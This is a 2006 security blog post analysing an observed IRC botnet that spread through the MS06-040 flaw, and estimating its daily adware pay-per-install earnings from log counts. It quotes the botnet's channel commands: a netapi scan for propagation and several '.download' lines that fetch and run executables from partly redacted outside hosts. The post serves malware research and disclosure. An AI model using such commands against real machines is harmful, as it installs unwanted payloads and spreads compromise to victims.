< Defacing Tool 2.0 Update | PacSec Dojo: Advanced Honeypot Tactics >

On the Economics of Botnets

Running a botnet can be a lucrative way for an attacker to get some money. He can for example rent his bots to a spammer who then uses the SOCKS proxy on the compromised machines to send out tons of spam. Or he can install keylogger or tools to read out the Protected Storage in order to retrieve sensitive information from the victims. Or he can install Adware on those machines and earn some money that way.

Adware seems to be rather lucrative: recently we were monitoring several botnets that uses the MS06-040 (Vulnerability in Server Service Could Allow Remote Code Execution) vulnerability (PoC). One of those botnets used the following channel structure:
  • # f00 #: .ircraw join # scan #,,# frame ## Do #,# a #
  • # scan #: .scan netapi 100 3 0 -r -b -s
  • # frame #: .download http://XXXsikpgz.com/dl/loadadv518.exe c:\lsas.exe 1 -s
  • # Do #: .download http://promo.dollarrevenue.com/webmasterexe/drsmartloadXXXa.exe c:\do.exe 1 -s
  • # a #: .download http://YYY.19.23.XXX/~from/taskmgr.exe c:\taskmgr.exe 1 -s


The main channel f00 is just used to dispatch all incoming bots. The bots join four different channels:
  1. # scan # is used to propagate further, all bots search other victims
  2. Adware is installed on all compromised machines with the topic of channel # frame #
  3. Another piece of Adware is installed in channel # Do # - in this case a binary from http://www.dollarrevenue.com/
  4. Finally, the channel # a # installs an additional binary on all bots.


Ok, and how much can a botherd earn with this kind of attacks? Taking a quick look at the numbers reveals the following result: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:
$ grep US 2006-08-28.log | wc -l 

998 

$ grep CAN 2006-08-28.log | wc -l 

20 

$ grep GBR 2006-08-28.log | wc -l 

103 

$ grep CHN 2006-08-28.log | wc -l 

756 

$ egrep -v "US|CAN|GBR|CHN”  2006-08-28.log | wc -l 

5852 



998 x $0.3 + 20 x $0.2 + 103 x $0.1 + 756 x $0.01 + 5852 x $0.02 = $438.30

So he earns more than $430 on a single day just with DollarRevenue, presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)
This entry was posted by Thorsten Holz on Friday, September 8. 2006 at 00:23. and is filed under malware. You can leave a response, or trackback from your own blog. All new comments are subject to moderation before being displayed.

Trackbacks

Trackback specific URI for this entry

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

    No comments


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.